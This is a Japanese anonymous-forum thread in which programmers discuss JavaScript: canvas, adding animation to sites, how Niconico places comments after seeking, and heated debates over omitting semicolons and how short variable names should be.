2017/03/08(水) 19:23:47.70 ID:???
>>471
canvasはcanvasで慣れないと引き伸ばされたりしてウワアアアってなる
それが更にレティーナだと???ってなる

理解できればどってことないんだけどね
で、あんまり使わないから久々い案件来るとウワアアアアってもう一回言うことに鳴る
477 :
2017/03/08(水) 19:30:24.73 ID:???
確かにAndroidブラウザの時代やフルスクリーンAPIの初期の頃は独特のノウハウが必要だったが
今現在慣れなんて要らないがな
478 :
2017/03/08(水) 19:35:38.15 ID:???
canvasって何かいいライブラリとかあるのかな
ずっとゴリゴリ書いてたわ。
正直、もうやりたくない
479 :
2017/03/08(水) 20:04:59.05 ID:???
ゲーム用くらいしか無いよ
CSS Animationくらいのがあればちょうどいいんだけどね
480 :
2017/03/08(水) 20:13:02.32 ID:???
ないかー、ありがとう
481 :
2017/03/08(水) 20:41:21.16 ID:???
javascritってオブジェクト指向理解できなくてもDOMとか理解できますか?
482 :
2017/03/08(水) 20:45:00.90 ID:???
理解はできないが使えはする
483 :
2017/03/08(水) 20:46:15.23 ID:???
オブジェクトとは何か(哲学)
484 :
2017/03/08(水) 20:54:13.34 ID:???
DOMさわるだけなら何思考だろうがどうでもいいよ
485 :
2017/03/08(水) 21:10:09.22 ID:???
そもそもJSの作者はオブジェクト指向の皮を被った関数型言語だし
486 :
2017/03/08(水) 21:12:34.57 ID:???
>>481です
つまりオブジェクト指向を理解してなくても、javascriptを用いてアニメーション的なサイトは作れるのでしょうか?
参考になる本とかありますか?
487 :
2017/03/08(水) 21:13:14.77 ID:???
間違えた
「の作者は」はいらねえわ
アイクがSchemaみたいな言語作りたかったのは間違いじゃないけど
488 :
2017/03/08(水) 21:13:34.85 ID:???
>アニメーション的なサイト
がよくわからん
単純なアニメならcssだけでもできる
489 :
2017/03/08(水) 21:14:23.95 ID:???
参考になるのはcssとjsの仕様
MDN見ればいい
490 :
2017/03/08(水) 22:20:06.86 ID:???
>>488
すみません
自分でもうまく説明できませんが、webサイトに動きをつけたいんです
>>489
リファレンス的な本は持ってるのでそれを参考にしてるんですが、webページに応用できるか心配です
491 :
2017/03/08(水) 22:23:42.09 ID:???
>>490
そのリファレンス的な本は何が書かれてる本なのか
492 :
2017/03/08(水) 22:37:25.54 ID:???
>>488
説明が難しいなら目標としたいサイトを挙げてみると良い
そこが使ってる技術が何なのかで方向性は決まるでしょ
493 :
2017/03/08(水) 22:37:41.45 ID:???
>>491
改訂新版javascript本格入門って本です

基礎的なこと
関数
オブジェクト
DOM
クライアントサイドjavascript開発を極める
現場で避けて通れない応用知識
494 :
2017/03/08(水) 22:51:13.58 ID:???
>>492
亜人ちゃんは語りたいってサイトみたいな動きです
どこでjavascriptが使われてるのかは分かりません…
今日は寝ます
495 :
2017/03/08(水) 22:54:12.35 ID:???
後ローディング中とか
メニューにマウスを近づけたら、そこから情報が出てきたりするのは、javascriptなのでしょうか?
496 :
2017/03/08(水) 22:55:28.57 ID:???
新手の本の宣伝に見えてきた

DOM理解できてんならあとはcssを知れば良いのであって
応用といえるレベルじゃないだろう
495はcssだけでも出来たりする
497 :
2017/03/08(水) 23:12:01.63 ID:???
>>494
http://demichan.com/
アニメーション的っていうかお前・・・ただのアニメのサイトやないか!w
派手だけど大したjsは使ってないよ
498 :
2017/03/08(水) 23:44:51.67 ID:???
そこの<form>の action="./pathToProgramFile"とかナメとんのか貴様と思った
499 :
2017/03/09(木) 00:01:15.35 ID:???
いつも思うんだけど、submitすることのないフォームを<form>で囲うのって正しいのかね?
500 :
2017/03/09(木) 02:30:11.51 ID:???
それがフォームだというのならformタグ使って当然じゃん。
別にsubmitするだけがフォームじゃないでしょ。
501 :
2017/03/09(木) 06:04:56.99 ID:???
JSをoffると問答無用で真っ白というロックさ
502 :
2017/03/09(木) 09:49:38.55 ID:???
>>496
HTMLとCSSは先に勉強しました
本の宣伝ではないですよ(笑)
javascriptの応用じゃなくて、javascriptをwebページに応用したいんです
>>497
アニメーション的なサイトでふさわしいのが見つかりませんでした
ただ動的にしたいんです
http://www.sayuri-web.com/sp/
こんな感じです
503 :
2017/03/09(木) 09:53:59.29 ID:???
>>502
またアニメやないかい!w
楽勝すぎるわこんなもん
このサイト構築に必要なのは、jsの知識ではなくデザインセンス
504 :
2017/03/09(木) 10:16:07.42 ID:???
例として出てくるURLの中身が自分的に胸糞だが何よりも
>HTMLとCSSは先に勉強しました
本当にこう言えるなら他人に聞くまでもなく何をすればいいか思い当たるはず
本一冊読んで「この言語マスターしたわー」の類
505 :
2017/03/09(木) 10:50:01.51 ID:???
>>503
自分もまだまだデザインセンス無いのでどうにかしたいです
>>504
すみません…
まだあの本を読み終えてないので読み終わってから考えたいと思います
506 :
2017/03/09(木) 11:44:44.18 ID:???
デザインセンスが無いのを相談されても他人にはどうしようもできんよ
そもそも殆どのWebサイトに見栄えのセンスなんて要らないし
Webサイトはあくまで情報を伝えるものだから、
いろんな環境から見て見やすいってことが大事

デザインはそれのエッセンス程度であって、
間違っても閲覧を邪魔するようなものであってはいけない
下手なフェードも初回以外は要らん
何度も情報を見に来てもらいたいと思ってるのならな
本当にセンスの良いWebサイトはその辺をよく考えて作ってある
507 :
2017/03/09(木) 13:55:37.32 ID:???
>>506
そうですねすみません
参考になりました!
508 :
2017/03/09(木) 14:42:38.55 ID:???
jQueryUI のページでも見れば?
509 :
2017/03/09(木) 15:57:28.88 ID:???
>>508
これは簡単そうですね
これ使ってみます
510 :
Name_Not_Found
2017/03/09(木) 16:41:04.27 ID:R7ZBdwPg
最近は末尾のセミコロン省略するのが流行りなのですか?
511 :
2017/03/09(木) 16:43:27.85 ID:???
それはさすがにない
512 :
Name_Not_Found
2017/03/09(木) 17:00:28.96 ID:R7ZBdwPg
electronの公式が省略してたので流行ってそうですけど違うんですかね・・・
https://electron.atom.io/docs/api/browser-window/
513 :
2017/03/09(木) 17:05:01.56 ID:???
そういう派閥もあるってだけで個人的にはないない
514 :
2017/03/09(木) 21:13:27.10 ID:???
いやマジでないわ
515 :
2017/03/09(木) 21:15:10.67 ID:???
() => { } これ使う人は ; も省略するわ
516 :
2017/03/09(木) 21:17:47.89 ID:???
npmやそれ管理してるECMAのメンバーがそのスタイル推してたでしょ
つうか俺もそれに賛同してるよ
だって結局セミコロン省略してもしなくても、忘れたときの問題は同じなのだから、態々見辛くなる様なもの付けないほうがいい。

それでもつけろと言うやつは===推進派と同じように感じる。
そこまでJSの振る舞い気に食わないならTSで書けよとな。
JS使う限りは最大限JSの特色をプラスに活かしていくべきだろうよ。
517 :
2017/03/09(木) 21:17:49.91 ID:???
アローは普通でしょ
セミコロンは外すと予期せぬエラーの元になるじゃん
518 :
Name_Not_Found
2017/03/09(木) 21:20:04.03 ID:yejvhr8m
>>517
それは普段付けてない人が、ミスしたときの事を思い浮かべるから勘違いしてしまうが、
実際は普段つけない人がより困るということはない。
519 :
2017/03/09(木) 21:30:22.75 ID:???
>>518
ああそういう考えもあるのか
まぁそれならそれで最初にチームではっきりと決めときゃいいんじゃない?
派閥が出来るほどのものでもないと思うけどな
520 :
2017/03/09(木) 21:36:07.40 ID:???
>>518の理屈がわからない
セミコロンを書くべきところでセミコロンを欠くミスは増減しなくても
セミコロン省略の仕組みから来るミスは間違いなく増えるだろうと思うのだが
521 :
2017/03/09(木) 21:41:06.21 ID:???
ニコ動のコメントって
再生箇所を任意のところにジャンプさせたときもその箇所に応じて
その時点で表示されるべきコメントがその時点で表示されるべき位置に来てるけど

こういうのってどういう構造なのだろうか。
js的にどういう処理になるのだろうか。
わかる方いたら解説をお願いします。
522 :
2017/03/09(木) 21:42:48.95 ID:???
セミコロンを省略して発生する「ミス」って具体的に何
それはコーディングルールで防御できないのかって話だよ
523 :
2017/03/09(木) 21:47:04.26 ID:???
省略に問題は無いけど自分は取り敢えず付けるかな
文は文だと目に見える形で表明して置きたい
524 :
2017/03/09(木) 21:52:26.30 ID:???
>>522
a = b + c
(d + e).print()

コーディングルールで防御、が通るならどういう書き方が良い悪いの話はほとんど意味なくなるのでは
525 :
2017/03/09(木) 21:56:27.63 ID:???
セミコロン無いとこういうのでバグる

let a, b, c, d,
 arr = [1, 2, 3],
 txt = 'test'

d = txt
[a, b, c] = arr


>>522
コーディングルールで防御ってつまりセミコロン付けるのがそうじゃないのか
お前は一体何を言ってるんだよ
526 :
2017/03/09(木) 21:58:20.57 ID:???
>>521
それは俺も思ったことあるな
まぁ「その時点で表示されるべきコメントがその時点で表示されるべき位置に来」る仕様にしてるだけだろう
527 :
2017/03/09(木) 22:02:30.96 ID:???
>>526
結局どういう仕様やねん!というのが気になって最近あまりよく眠れません
528 :
2017/03/09(木) 22:07:46.19 ID:???
>>527
だからそういう仕様だろw
例えばコメの表示は4秒、0:10に投稿とする
で、0:12にシークするなら

var コメ消去時刻 = 投稿時間 + 4s;
if (コメ消去時刻 < シーク時間){
 表示位置=(コメ消去時刻-シーク時間)/4;
}

大体こんな感じだろう
どうでもええわ
529 :
2017/03/09(木) 22:13:03.06 ID:???
>>528
それだとシークする度にコメント全走査になりませんか。
シーク時間から4秒や多めに見積もって8秒以内のコメントを探して
探し当てたコメントだけ全処理するにしても
わかるのはコメントごとの投稿時間だけとなれば全コメントを走査しないと。
してるのだろうか。
530 :
2017/03/09(木) 22:29:35.38 ID:???
>>529
背景透明、コメントを表示した横になが〜〜〜〜〜い画像を作っておいて、それを単純にスライドさせるという手もある
気になるならjs追いかけてみては?
DOM要素をスクロールさせてるなら追いかけて見てみようとオモタけど、canvasだったから俺は追いかけないわ。めんどい
531 :
2017/03/09(木) 22:29:56.82 ID:???
時間でソートされてるコメント配列のポインタを再生位置の数秒前に合わせて順番に表示するだけだろ
二分探索なら何万件あろうと十回ちょっとループ回すだけ
532 :
2017/03/09(木) 22:31:24.24 ID:???
確か取得するのは最新1000件ぐらいだった気がする
全部取得して回すのは余裕だね
533 :
2017/03/09(木) 22:37:55.70 ID:???
>>530-532
おおおすげー!横長スライドは目から鱗、そういう手もあるんですね。
二分探索したり取得コメント自体を減らすのも思いつきませんでした。
データ処理なんだからそういうの考えて当然ですよね。すいません。
ちまちまjs追いかけてみてみます。
534 :
2017/03/09(木) 22:39:00.50 ID:???
ニコの仕様(変更してるかもしれないけど)
× 取得コメント自体を減らす
○ 最初から1000件しか取得していない
535 :
2017/03/09(木) 22:39:37.29 ID:???
>横になが〜〜〜〜〜い画像
1時間以上ある動画だとメモリ即死しそうw
536 :
2017/03/09(木) 22:43:27.43 ID:???
だがやってみたくなる気もする
537 :
2017/03/09(木) 22:50:08.08 ID:???
>>520
省略の仕組みから来るミスというけれど、付ける派だって複数行の文など付けてはいけない所に付けないように気をつける必要がある
どちさにせよ省略の挙動は意識しないといけない
538 :
2017/03/09(木) 23:02:55.43 ID:???
>>537
具体例よろ
どちらにしろ意識しなければならないものというのは
省略の挙動ではなく文法特に制御構造の扱いではないか
539 :
2017/03/09(木) 23:26:15.83 ID:???
省略派ってのをググって見たが「末尾に付けるのをやめて行頭に付けよう」ってただ変わった書き方してドヤりたいだけのギークじゃん
こんなアホに感化される奴の気が知れんわ
540 :
2017/03/10(金) 00:11:48.00 ID:???
セミコロンを外すと意味変わるコードっていうのはある

それがあるという前提で、
JavaScriptではセミコロンをつけましょう。
Rubyでは出来る限り省略しましょう。

という違いが生まれているのがおもしろい
541 :
2017/03/10(金) 00:17:39.54 ID:???
rubyは行末セミコロン外して意味が変わるケースがまったく無いからな
542 :
2017/03/10(金) 01:46:36.70 ID:???
分割代入の登場でセミコロンが必須なケースがかなり増えたね
543 :
2017/03/10(金) 02:20:34.72 ID:???
>>541
でもさ、Rubyはカッコが省略できるけどするべきじゃないんだろ?
カッコを忘れると意味が変わるケースがあるから
544 :
2017/03/10(金) 09:41:45.41 ID:???
例えば「 a = \n \t 1 + 2 」の\nの前には当然付けないようにするでしょ?
でもreturn文なんかでは場合によって強制挿入されることを意識するよね?
つまり「 return \n \t 1 + 2 」は「 return; 1 + 2; 」となるということ。
一方付けない派は、結局文頭の括弧の前だけに気をつければ良いんだよ。
最初の例で当然付けないように、当然付けるというだけ。
545 :
2017/03/10(金) 09:42:33.55 ID:???
>>538
546 :
2017/03/10(金) 09:48:05.20 ID:???
セミコロン省略したらreturnの挙動が安定するなんて初耳だな
547 :
Name_Not_Found
2017/03/10(金) 10:37:51.97 ID:jGEsjasC
文頭の括弧って

a + b
(c+d).xx
このパータンだけ気にすればいいってことですか?
548 :
2017/03/10(金) 10:54:19.86 ID:???
var ; i ; = ; 3 ; なんて記述をしないよう気をつけなきゃいけない
と言っているのと同じで常識的にありえない例にしか見えないんだが
549 :
2017/03/10(金) 11:39:08.18 ID:???
意識高い人たちが省略しはじめてんだから流行りそうだ
550 :
2017/03/10(金) 11:58:01.15 ID:???
>>549
そういえば昔、漢字を廃止してひらがなかローマ字だけにしようとか意識高い系が喚いてたらしいな
551 :
2017/03/10(金) 12:06:31.64 ID:???
>>550
10秒くらい考えたけどまるで意味がわからん
552 :
2017/03/10(金) 12:29:15.94 ID:???
>>549
生みの親のアイクは推奨してないから、そういった意味でも派閥争いになるな
553 :
2017/03/10(金) 12:46:05.57 ID:???
>>547
加えて>>525にもあるように[]もだね。
あと、かなりレアケースかもしれないけど、文頭が/で始まる場合も。
a + b
/hoge/.test(str) && func()
554 :
2017/03/10(金) 12:58:26.99 ID:???
省略派は必須派に対抗して、
省略しても意外と問題ないんだよ。インデントみたいにどっちでもいいじゃないか。
と言いたいだけで、別に皆省略すべき、略すのが推奨とまでは言っていない。
ただ過剰な忌避感を取りさらって認めてもらいたいだけ。
555 :
2017/03/10(金) 13:09:57.38 ID:???
>>554
standard styleとか勝手に主張して意固地になってるのは省略派の方だけどな
そもそもセミコロンが必須な場面においても行末は嫌だから行頭に書こうって、それお前が顔真っ赤にしてる以外に何か論理的な理由があるのかと
556 :
2017/03/10(金) 13:45:43.50 ID:???
ニコニコ動画はjavascript使われてないよ
557 :
2017/03/10(金) 14:46:41.23 ID:???
>>555
そりゃ省略できるものは省略した方がスマートだからだよ。
その分コードがスッキリする。
あと必要な場面で付けるのは別に行末でも俺は良いと思うよ。
ただ、コードを移動させたりすると行末じゃ意図しない結合を生んでしまうという論理的な理由があるでしょ。
それと行頭のカッコの前とした方が分かりやすい。
558 :
2017/03/10(金) 15:00:50.16 ID:???
>>557
ところでお前何でわざわざ句点付けてるの?
省略した方がスマートだしすっきりするのに
559 :
2017/03/10(金) 15:07:35.27 ID:???
> コードを移動させたりすると行末じゃ意図しない結合を生んでしまう

分かった
こいつ馬鹿だ
560 :
2017/03/10(金) 15:13:49.63 ID:???
ここで言い合っても仕方ない
Electronのような先進的なものを作ってる奴らが省略してるんだから流行る方に賭ける
561 :
2017/03/10(金) 15:16:05.32 ID:???
じゃあ俺は流行らない方に1e10ジンバブエドル賭けるわ
562 :
2017/03/10(金) 16:04:49.86 ID:???
セミコロン以前にJavaScriptがもっと流行ってくれんと…
563 :
2017/03/10(金) 16:24:17.18 ID:???
>>558
ここで長文を書くときは大体句読点を付けるよ。そっちの方がしっくりくる。
これがいい加減な気持ちで書いたのではないってのを表すためでもある。
俺なりの誠意の表れだと思って欲しい。
それに、ニュアンスが変わるから無駄とも思ってない。

同じく俺でもセミコロンだとか===も意図的に使うことあるよ。
句読点と同じで意図的にニュアンスのために使うのはむしろ大好きだ。
俺が嫌いなのは取り敢えずセミコロン付けとけとか、
取り敢えず===使っとけというので、
しかもそれが本当は大したメリットもないのに信じ込まれている場合。
つまり俺は、セミコロンを大切に、有意義に使おうと言いたいのであって、
セミコロン「が」無駄だから撲滅したいわけではない。
564 :
2017/03/10(金) 16:25:31.05 ID:???
>>559
本当に分かんない?
そもそもセミコロンが必須な場面において省略派はなぜ文頭に付けようとするかって話だよ?
例えば
a=1;
[1,2,3].forEach
という2つの文を考えたとき、
1番目や2番目の文を何処かに持ってっちゃったり、間に書き加えたとき大変なことになっちゃうかもしれないでしょ。
565 :
2017/03/10(金) 17:42:17.42 ID:???
ただの中二病患者だな
周りとは違う自分に酔ってるだけ
566 :
2017/03/10(金) 17:51:04.41 ID:???
付けようとすると付け忘れたとき危ないので
最初から付けない前提で悪影響のない書き方をする
という人がいても別にいいと思うが
実質的に発生しないようなレアケースを持ち出して付けろと強要する必要あるだろうか
567 :
2017/03/10(金) 17:55:45.96 ID:???
セックスの時はゴムを付けるべきだがゴムを付け忘れると大変なことになるので
俺はそもそもセックスをしないようにしている
568 :
2017/03/10(金) 18:12:27.11 ID:???
とりあえずお前ら全員死んでくれ
569 :
2017/03/10(金) 18:17:40.59 ID:???
>>566
どちらかというと省略派が強制してるんやで
言語構造的な是非はともかく強制されたらそりゃあやる気も失せるってもんよ
570 :
Name_Not_Found
2017/03/10(金) 18:21:24.76 ID:jGEsjasC
; ()
; []
↑のようなコードは基本書かないけど
これだけ気を付けてれば全体がすっきりする
python好きなら分かると思う
571 :
Name_Not_Found
2017/03/10(金) 18:24:41.91 ID:jGEsjasC
>>553
お礼を言ってなかった。。ありがとうm(__)m
あと /reg/ もだけど普通代入するだろうから心配するレベルじゃないような
572 :
2017/03/10(金) 18:25:28.21 ID:???
>>566
実質的に発生しないレアケースなのに付け忘れたとき危ないとかお前心配性だな
573 :
2017/03/10(金) 19:51:35.85 ID:???
return
  行頭・行末関係なく、returnと戻り値との間に改行を入れるなというだけ

行末セミコロンが意図しない結合を生む例
  未だ具体的に挙げられていない

===と==との関連
  書き方の問題ではなく意味が違う
574 :
2017/03/10(金) 20:47:21.49 ID:???
>>474
図星だったのか?
575 :
2017/03/10(金) 20:52:01.63 ID:???
>>563
読みやすい。
あと句読点無しは池沼文章だからな。
576 :
2017/03/10(金) 20:52:45.58 ID:???
えっ、何この自演怖い
577 :
2017/03/10(金) 21:36:14.78 ID:???
むしろ匿名掲示板じゃ句点ある方が池沼扱いだけどな
何故なら匿名掲示板に書かれる文は文語じゃなく口語だから

大多数の漫画のフキダシに句点がないのと同じ
578 :
2017/03/10(金) 22:00:45.21 ID:???
俺は正式な文法を守るためにセミコロンを全て付けてる。
決して、「とりあえず、付けとけ」のようないい加減な理由じゃない。
セミコロンを省略するのは「日本語で文末に改行が入る時だけ "。" を省略する文章」と同じものを感じて好きじゃないし、そっちの方がいい加減に感じる。
統一性が大事だと思ってる。
579 :
2017/03/10(金) 22:04:23.53 ID:???
>>578
大層な理念のわりには読点の使い方が雑なように思われるのだが
580 :
2017/03/10(金) 22:55:55.14 ID:???
>>579
何が間違ってるのか分からないが、読点を省略はしてない。
自分の日本語力はそれほど高くないし、正しい日本語講座をここでやっても仕方がないとは思うが。
581 :
2017/03/10(金) 22:59:59.03 ID:???
コーディング規約とコーディングスタイルは
よくごっちゃにされるけど、

コーディングスタイルは、基本的にどれでも良いもの
;をつけるとかつけないとか、どっちでもいい。
そんなのにこだわるのは時間の無駄。

適当に標準のコーディングスタイルを選んで
ツールを使って、スタイル違反を検出修正すればいい。
582 :
2017/03/11(土) 05:30:39.19 ID:???
ツールを使って、スタイル違反を検出修正っておま
手段と目的が逆転してるだろ
Googleのプロジェクトでもそんなこと推奨してないぞ?
こっちの関数を使ってはたまにあるけどスタイルが違うからコミットしませんはない
たまにお前みたいに勘違いしてる奴が細部の修正だけを送っているが全部突っぱねられてる
583 :
2017/03/11(土) 08:39:22.39 ID:???
コーディングスタイルに制約をかけるのがコーディング規約。
コーディング規約に反しない限りは個人の自由だが、そこでツールを使うかどうかは別問題。
チーム内でツールを使うことが定められているなら使うし、そうでないならコーディング規約に反しない範囲で自由にして良い。

最も、セミコロン省略についてはヒューマンエラーが発生するデメリットがあるから、いろんなコーディング規約で禁止されているのだと思うがね。
趣味の範囲ならJavaScriptにおけるセミコロン省略は「自己責任で好きにすればいい」というが、一般に他人に勧めるなら「セミコロン禁止」を推奨するな。
全ての人が上級者でコードリーディングに長けているなら、コーディング規約は生まれていない。
スマートに解決したいなら、CoffeeScript等のAltJS系を使えば良いだろう。
584 :
2017/03/11(土) 08:54:57.16 ID:???
>>583を訂正。

× 一般に他人に勧めるなら「セミコロン禁止」を推奨するな。
○ 一般に他人に勧めるなら「セミコロン省略禁止」を推奨するな。
585 :
2017/03/11(土) 09:04:46.75 ID:???
・セミコロン省略禁止には相応の理由がある
・セミコロン省略禁止を推奨するな

訂正後が逆に意味わからん
586 :
2017/03/11(土) 09:07:37.90 ID:???
1文あたりのタイプ数が1増えること以外で
「セミコロンを省略しないこと」のデメリットがあったら誰か教えてくれ
587 :
2017/03/11(土) 11:20:37.72 ID:???
たった1タイプどうでもよくね
なに、省略すると目に見えて開発時間が短くなるの?
588 :
2017/03/11(土) 13:35:14.98 ID:???
>>585
ああ、ごめん。
紛らわしい書き方をしてしまったが、「推奨するな」は命令形ではなく、「〜だな」と同種の意味で書いた。
「推奨する」に置き換えて解釈してくれ。
589 :
2017/03/11(土) 13:57:45.93 ID:???
>>586
デメリットねぇ
1タイプ増えるとそれだけミスが増え、修正にかかる時間も必要になる
あと「;」と「:」が隣のキーな上に見た目似すぎでタイプミスに気づきにくい

正直どっちでもいい。規約が無ければ好きにすれば良いと思う
一番無駄なのはこういうことでぐだぐだ言う時間だな
590 :
2017/03/11(土) 14:32:17.91 ID:???
> 1タイプ増えるとそれだけミスが増え、修正にかかる時間も必要になる

その理屈で言えば、変数名はなるべく短くすべきってことになると思うが?

コードで必要なのは「可読性」
タイプ数ではない。

タイプ数なんて文字数が2、3倍変わったとしても
適切なエディタとツールを使っていれば大差ない。

文字数が2、3倍変わったとしても、
人間は単語単位で読んでいるから可読性に違いは生じない
591 :
2017/03/11(土) 15:02:47.00 ID:???
>>590
変数名はなるべく短くすべきだよ
そして可能な限りスコープを狭くする
長い変数名付けるのはスコープが広い最小限のもののみ
これは絶対的な原則

単語単位で読んでいるから可読性に違いは生じない
というのも大間違い
592 :
2017/03/11(土) 15:04:49.92 ID:???
o=z(a+b)->c
593 :
2017/03/11(土) 15:06:24.94 ID:???
> 変数名はなるべく短くすべきだよ
一文字変数にしろと?
594 :
2017/03/11(土) 15:09:23.30 ID:???
>>591
今はタイプ数を減らすことに意味がないという話をしてる。
595 :
2017/03/11(土) 15:10:29.97 ID:???
>>591
人間が単語単位で読んでいるのは本当
http://www.yukawanet.com/archives/4191006.html

こんちには みさなん おんげき ですか? わしたは げんき です。
この ぶんょしう は いりぎす の ケブンッリジ だがいく の
けゅきんう の けっか にんんげ は もじ を にしんき する とき
その さしいょ と さいご の もさじえ あいてっれば
じばんゅん は めくちちゃゃ でも ちんゃと よめる という
けゅきんう に もづいとて わざと もじの じんばゅん を
いかれえて あまりす。どでうす? ちんゃと よゃちめう でしょ?
596 :
2017/03/11(土) 15:12:36.03 ID:???
>>593
その通り
むしろ1文字で済まないほど影響範囲がでかい変数が沢山ある方がまずい
その瞬間、その場面で考える要素はできるだけ少ない方がいい
そうやってスコープを極力短くするよう心がければ多くの変数は1文字で十分
597 :
2017/03/11(土) 15:12:45.71 ID:???
>>595
これは「人間が単語単位で読んでいる」ことを証明するものではないのでは
598 :
2017/03/11(土) 15:13:50.33 ID:???
>>596
変数名を短くして何が嬉しいの
599 :
2017/03/11(土) 15:14:39.42 ID:???
>>597
> 現段階ではなぜ読めるのか、科学的な根拠はないにしろ、人間は単語を
> 1文字1文字読んで認識するのではなく、ある程度かいつまんで脳内で
> 文章を組み立てているのではないかと推測される。

単語よりももっと広い範囲のようだなw

どちらにしろ、そんな些細な文字数は
可読性に影響しないということだ

1文字1文字読んで認識してないんだからな
600 :
2017/03/11(土) 15:15:11.13 ID:???
>>596
だから、てめーがいってるのは、
タイプするを減らすことに意味があるって
話じゃねーだろ
601 :
2017/03/11(土) 15:15:23.56 ID:???
>>595
『可読性に違いは生じない』ということを否定したのだが、
君は読める読めないレベルの話をしていたのか?
それとも君はその文章が普通のものと変わらず読みこなせる超人なのか?
すごーい!!
602 :
2017/03/11(土) 15:16:28.05 ID:???
一文字変数ってお前
保守の時はどうすんだ?
603 :
2017/03/11(土) 15:17:27.70 ID:???
>>599
少ない文字数=理解しやすい が真とは言えないとは思うが
例示の研究結果は「ふーんそれで?」としか思えん、それくらい別問題
604 :
2017/03/11(土) 15:17:56.75 ID:???
>>602
自分が保守するんじゃなけりゃどうでもいいです!
605 :
2017/03/11(土) 15:18:40.78 ID:???
>>600
君自分が発言した内容も忘れちゃったの?
「その理屈で言えば、変数名はなるべく短くすべきってことになると思うが? 」
っていう発言が出るのは、「変数名はなるべく短くすべきじゃない」という思考を持ってるからだろ
そもそもその前提が間違ってるという突っ込みを入れてるんだよ
606 :
2017/03/11(土) 15:20:31.26 ID:???
>>601
> 『可読性に違いは生じない』ということを否定したのだが、
> 君は読める読めないレベルの話をしていたのか?

一文字のタイプの違いが可読性にどう影響するかの
話をしてるのに、お前は何の話をしてるんだ?

人間は一文字一文字読んでないということなんだから、
一文字の違いは可読性に影響しないことに証拠だろ
607 :
2017/03/11(土) 15:21:20.67 ID:???
>>605
あー、お前馬鹿だわw

「なるべく短くすべき」の反対が
「なるべく長くすべき」だと思ってるだろー

こいつぁー間抜けだw
608 :
2017/03/11(土) 15:24:23.76 ID:???
どことはいわないけど
605みたいな詭弁で荒らす奴最近あちこちでみかける
609 :
2017/03/11(土) 15:26:18.55 ID:???
>>607
頭大丈夫かい?
正解はなるべく短くすべき、「なるべく短く短くして当然、と言ってるんだけど?
長くすべきとか論外だろう、流石に君がそこまでの脳足りんとは考えてないよ
そしてそれは可読性の面でもメリットがある
610 :
2017/03/11(土) 15:26:53.69 ID:???
変数名は意味がわかなくなるまで短くしてはいけない
だからなるべく短くすべきは間違い
611 :
2017/03/11(土) 15:27:45.29 ID:???
「必ずしも短くすべきとはいえない」と「長くすべき」は同一ではない

中学生でもわかるレベル
612 :
2017/03/11(土) 15:28:29.06 ID:???
>>609
後出しで条件つけるんじゃねーよ?
後出し条件はお前が間違っていたことを認めることになる。


>>609は「名前はなるべく短くすべき」と言ってる。
例えば、a〜zのという一文字の名前が良いと言ってる
613 :
2017/03/11(土) 15:29:18.10 ID:???
>>609
クッソ長い変数名は可読性が下がるが
クッソ短い変数名も可読性が下がる

変数名はセミコロン省略とは関係ない

おk?
614 :
2017/03/11(土) 15:29:37.14 ID:???
>>610
実はその考えが間違い
殆どの使い捨ての変数に意味なんて考えて立派な名前を付けてあげる必要はないんだよ
615 :
2017/03/11(土) 15:31:09.92 ID:???
>1タイプ増えるとそれだけミスが増え、修正にかかる時間も必要になる
>あと「;」と「:」が隣のキーな上に見た目似すぎでタイプミスに気づきにくい

発端のこれが視野狭すぎ
616 :
2017/03/11(土) 15:31:18.55 ID:???
> 「殆どの使い捨ての」変数に

おっと、早速条件をつけてましたぜwww
617 :
2017/03/11(土) 15:32:03.72 ID:???
>>604
鬼杉ワロタ
618 :
2017/03/11(土) 15:33:35.06 ID:???
長い変数でも気にせんわ。読みにくくて短いものよりよっぽどいい
そして可変変数、お前は出てくるな話がややこしくなる
619 :
2017/03/11(土) 15:33:43.84 ID:???
>>613
そういうこと。たった一文字変わっただけで
可読性は変わらない。

意味がわかる名前になってるかが重要。
例えば、
apple と
banana では 文字数が違うが

この文字数の違いで可読性は変わらない。

;をつけるかどうかも、可読性には影響しないし
タイプ数なんて重要じゃない
620 :
2017/03/11(土) 15:36:45.91 ID:???
>>612
もう一度言っておくけど、こっちが言ってることは、
まず第一にできるだけ多くの変数の影響範囲を小さくしろというのがある
影響範囲が狭い使い捨ての変数の名前が短い方が良いのは自明だろう?
それこそa〜zで済むような設計ができたら最高だねって話なんだから
間違っても君が普段書いてるようなお粗末なコードで考えてはいけないよ
621 :
2017/03/11(土) 15:37:29.16 ID:???
>>620
もう一度言ってやるよ

>>596
だから、てめーがいってるのは、
タイプするを減らすことに意味があるって
話じゃねーだろ
622 :
2017/03/11(土) 15:38:03.32 ID:???
>>616
君大丈夫か?
最初>>591からそういうことを言ってるだろ
623 :
2017/03/11(土) 15:38:04.66 ID:???
array.sort()の中にいれる無名関数で比較対象をそれぞれa, bと命名するような
クッソ狭い領域でなら許可
624 :
2017/03/11(土) 15:39:12.04 ID:???
正直ループ変数も一文字は読みづらい
625 :
2017/03/11(土) 15:39:19.60 ID:???
>>621
その通り
直接タイプするを減らすことに意味があるって 話じゃないが、
君の前提が間違ってるのでまずそこから突っ込みを入れざるを得なかった
626 :
2017/03/11(土) 15:40:34.07 ID:???
>>591
> 変数名はなるべく短くすべきだよ

間違い
627 :
2017/03/11(土) 15:41:36.55 ID:???
変数名を短くして良いのは
スコープが小さいときだけ。
628 :
2017/03/11(土) 15:42:27.81 ID:???
因果関係が逆なんだろうねw

手段が目的なってるってやつ。
629 :
2017/03/11(土) 15:42:33.30 ID:???
>>626
結局君が間違いだと思うならそれでも良いんだよ
でも前提がここまで合わないとそもそも話ができない
だから少しでもこっちの考え方をぶつけてみただけ

つうかこっちは色々ぶつけたんだから
今度は君の独自の考えをもっと深く聞かせてよ
630 :
2017/03/11(土) 15:43:37.89 ID:???
>>629
都合悪いレスから逃げまくりワロタ
631 :
2017/03/11(土) 15:44:03.38 ID:???
>>629
だから、名前はなるべく短くすべきだよっていうのは間違い
それが俺の考え方だが?

短くした結果、何の名前か意味がわからなくなったら可読性は下がる
632 :
2017/03/11(土) 15:49:00.30 ID:???
eは見逃してやって下さい
633 :
2017/03/11(土) 15:56:50.45 ID:???
>>629
逃げまくりというのが分からん
大前提としてこっちは相互理解が目的で喧嘩を吹っかけてるわけじゃないんだから
そこは絶対に勘違いしないでほしい

>>631
>>短くした結果、何の名前か意味がわからなくなったら可読性は下がる
うーん?本当にそう思うの?
それはもう完成されてるコードの変数を短くすることをイメージしてない?

こっちも具体的に言うけど、そもそも変数の「意味」は変数名で分かるとしても、
それだけじゃそれが具体的にどんな値なのかってのは分からないのよ
例えばiとかjとか、これがループ変数だって意味は分かっても、
